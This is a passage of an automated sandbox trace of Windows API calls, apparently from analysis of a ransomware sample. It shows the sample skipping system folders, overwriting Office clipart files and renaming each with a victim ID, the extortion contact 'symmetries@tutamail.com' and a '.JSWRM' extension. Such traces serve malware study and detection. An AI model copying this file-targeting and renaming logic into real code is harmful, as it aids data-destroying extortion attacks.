HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0095.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0095.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0095.562] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x280c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00192_.WMF", cAlternateFileName="")) returned 1 [0095.562] lstrcmpiW (lpString1="SO00192_.WMF", lpString2=".") returned 1 [0095.562] lstrcmpiW (lpString1="SO00192_.WMF", lpString2="..") returned 1 [0095.562] lstrcmpiW (lpString1="SO00192_.WMF", lpString2="...") returned 1 [0095.562] lstrcmpiW (lpString1="SO00192_.WMF", lpString2="windows") returned -1 [0095.562] lstrcmpiW (lpString1="SO00192_.WMF", lpString2="recovery") returned 1 [0095.562] lstrcmpiW (lpString1="SO00192_.WMF", lpString2="perflogs") returned 1 [0095.562] lstrcmpiW (lpString1="SO00192_.WMF", lpString2="documents and settings") returned 1 [0095.562] lstrcmpiW (lpString1="SO00192_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.562] lstrcmpiW (lpString1="SO00192_.WMF", lpString2="system volume information") returned -1 [0095.562] lstrcmpiW (lpString1="SO00192_.WMF", lpString2="msocache") returned 1 [0095.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0095.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00192_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00192_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00192_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0095.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0095.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00192_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00192_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00192_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0095.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0095.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0095.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0095.563] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00192_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00192_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.565] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10252) returned 1 [0095.565] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2800) returned 0x24d210 [0095.565] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2800, lpOverlapped=0x0) returned 1 [0095.618] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.618] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2800, lpOverlapped=0x0) returned 1 [0095.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.618] CloseHandle (hObject=0x314) returned 1 [0095.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0095.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0095.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0095.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0095.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0095.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0095.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0095.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0095.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.618] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00192_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00192_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00192_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00192_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0095.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0095.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0095.620] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x27c0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00194_.WMF", cAlternateFileName="")) returned 1 [0095.620] lstrcmpiW (lpString1="SO00194_.WMF", lpString2=".") returned 1 [0095.620] lstrcmpiW (lpString1="SO00194_.WMF", lpString2="..") returned 1 [0095.620] lstrcmpiW (lpString1="SO00194_.WMF", lpString2="...") returned 1 [0095.620] lstrcmpiW (lpString1="SO00194_.WMF", lpString2="windows") returned -1 [0095.620] lstrcmpiW (lpString1="SO00194_.WMF", lpString2="recovery") returned 1 [0095.620] lstrcmpiW (lpString1="SO00194_.WMF", lpString2="perflogs") returned 1 [0095.620] lstrcmpiW (lpString1="SO00194_.WMF", lpString2="documents and settings") returned 1 [0095.620] lstrcmpiW (lpString1="SO00194_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.620] lstrcmpiW (lpString1="SO00194_.WMF", lpString2="system volume information") returned -1 [0095.620] lstrcmpiW (lpString1="SO00194_.WMF", lpString2="msocache") returned 1 [0095.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0095.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00194_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00194_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00194_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0095.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0095.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00194_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00194_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00194_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0095.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0095.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0095.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0095.621] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00194_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00194_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.638] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10176) returned 1 [0095.638] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27c0) returned 0x24d210 [0095.638] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x27c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x27c0, lpOverlapped=0x0) returned 1 [0095.641] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.641] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x27c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x27c0, lpOverlapped=0x0) returned 1 [0095.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.641] CloseHandle (hObject=0x314) returned 1 [0095.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0095.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0095.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0095.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0095.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0095.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0095.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0095.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0095.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0095.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0095.641] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00194_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00194_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00194_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00194_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0095.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0095.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0095.642] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10313bcd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10313bcd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x238c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00197_.WMF", cAlternateFileName="")) returned 1 [0095.642] lstrcmpiW (lpString1="SO00197_.WMF", lpString2=".") returned 1 [0095.642] lstrcmpiW (lpString1="SO00197_.WMF", lpString2="..") returned 1 [0095.643] lstrcmpiW (lpString1="SO00197_.WMF", lpString2="...") returned 1 [0095.643] lstrcmpiW (lpString1="SO00197_.WMF", lpString2="windows") returned -1 [0095.643] lstrcmpiW (lpString1="SO00197_.WMF", lpString2="recovery") returned 1 [0095.643] lstrcmpiW (lpString1="SO00197_.WMF", lpString2="perflogs") returned 1 [0095.643] lstrcmpiW (lpString1="SO00197_.WMF", lpString2="documents and settings") returned 1 [0095.643] lstrcmpiW (lpString1="SO00197_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.643] lstrcmpiW (lpString1="SO00197_.WMF", lpString2="system volume information") returned -1 [0095.643] lstrcmpiW (lpString1="SO00197_.WMF", lpString2="msocache") returned 1 [0095.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0095.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00197_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00197_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00197_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0095.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0095.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00197_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00197_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00197_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0095.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0095.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0095.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0095.643] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00197_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00197_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.644] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9100) returned 1 [0095.644] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2380) returned 0x24d210 [0095.644] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2380, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2380, lpOverlapped=0x0) returned 1 [0095.646] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.646] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2380, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2380, lpOverlapped=0x0) returned 1 [0095.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.646] CloseHandle (hObject=0x314) returned 1 [0095.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0095.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0095.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0095.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0095.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0095.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0095.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0095.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0095.647] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00197_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00197_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00197_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00197_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0095.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0095.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0095.648] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10313bcd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10313bcd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10313bcd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15fe, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00199_.WMF", cAlternateFileName="")) returned 1 [0095.648] lstrcmpiW (lpString1="SO00199_.WMF", lpString2=".") returned 1 [0095.648] lstrcmpiW (lpString1="SO00199_.WMF", lpString2="..") returned 1 [0095.648] lstrcmpiW (lpString1="SO00199_.WMF", lpString2="...") returned 1 [0095.648] lstrcmpiW (lpString1="SO00199_.WMF", lpString2="windows") returned -1 [0095.648] lstrcmpiW (lpString1="SO00199_.WMF", lpString2="recovery") returned 1 [0095.648] lstrcmpiW (lpString1="SO00199_.WMF", lpString2="perflogs") returned 1 [0095.648] lstrcmpiW (lpString1="SO00199_.WMF", lpString2="documents and settings") returned 1 [0095.648] lstrcmpiW (lpString1="SO00199_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.648] lstrcmpiW (lpString1="SO00199_.WMF", lpString2="system volume information") returned -1 [0095.648] lstrcmpiW (lpString1="SO00199_.WMF", lpString2="msocache") returned 1 [0095.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0095.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00199_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00199_.WMF", cchWideChar=12, 